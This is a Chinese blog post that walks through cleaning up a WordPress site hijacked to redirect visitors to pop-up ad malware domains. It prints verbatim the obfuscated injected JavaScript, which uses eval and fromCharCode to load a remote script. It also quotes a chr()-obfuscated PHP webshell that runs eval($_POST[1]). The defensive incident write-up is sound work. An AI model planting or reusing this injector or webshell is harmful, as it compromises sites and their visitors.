• wordpress站点被恶意重定向


    背景

    一个wordpress站点 访问主站后跳转至其他恶意域名 抓包看了一下 利用的是302跳转 而不是直接转向其他站
    跳转的域名如下

    bestprize-places-here1.life
    bestanimegame.com
    auteartumn10.live
    location.lowerbeforwarden.ml
    adaranth.com
    deloton.com
    

    属于pop-up AD malware,国内搜索引擎没搜到什么东西

    排错

    一开始上来一脸蒙蔽 看了一些资料后总结如下:

    查看js文件 是否有异常

    异常js:

    <script type=text/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,52,54,44,49,49,54,44,49,49,52,44,57,55,44,57,57,44,49,48,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,49,48,53,44,49,49,53,44,49,49,54,44,49,48,53,44,57,57,44,49,49,53,44,49,49,53,44,49,49,53,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,54,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));</script>
    

    搜索恶意域名 或String.fromCharCode,不过还是要以实际js文件出现异常为主,毕竟只是一种编码方式

    检查php文件

    会不会被植入了webshell
    .htacess文件有没有被修改
    wp-config.php有没有问题
    这里因为没有拿到源代码没法进行排查
    在知乎上看到一段

    找到问题了 被植入了webshell 三个马 都有混淆
    一个小马

    <?php 
    $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);
    echo $_cC; //eval($_POST[1])
    echo $_fF;//create_function
    @$_();
    ?>
    
    

    检查数据库

    数据库是因为wp_options和wp_post两张表里有涉及主站url地址,这个被修改可能会导致问题发生

    恶意攻击通常会篡改 wp_options 中的 siteurl 值和 home 值,使得用户访问站点时,站点 URL 部分被替换成恶意网站,实现跳转,并且由于 /wp-admin 的访问也会校验站点地址,所以我们甚至无法登录后台去修改回来。
    

    被感染的原因

    这个查了很多都没找到结果 邮件咨询了一位老外 他认为是插件plugins or themes引起的问题,比如最近的FileMangager漏洞,但是这个wordpress站点没有使用

    查了js和数据库备份 都没找到
    找到webshell了 问题解决
    参考链接:
    https://guides.magefix.com/2020/08/go-donatelloflowfirstly-ga/
    https://guides.magefix.com/2020/09/lowerbeforwarden-ml/
    https://okeyravi.com/wordpress-website-malware-fix/#These_are_some_common_reasons_for_a_website_to_be_hacked
    https://zhuanlan.zhihu.com/p/220211489

  • 相关阅读:
    Http常用请求
    大量数据导出到Excel(不使用微软Excel控件)---------------转自CSDN--rocket2010
    ASP.NET 在IIS上发布时,报错404.17 提示找不到系统文件
    PTA7-1 一元多项式的乘法与加法运算(Java实现)
    Java输入几行字符串
    看电视(贪心算法)
    出租车费(贪心算法)
    简化路径(栈实现)
    有效的括号
    链表反转
  • 原文地址:https://www.cnblogs.com/rookieDanny/p/13645111.html
Copyright © 2020-2023  润新知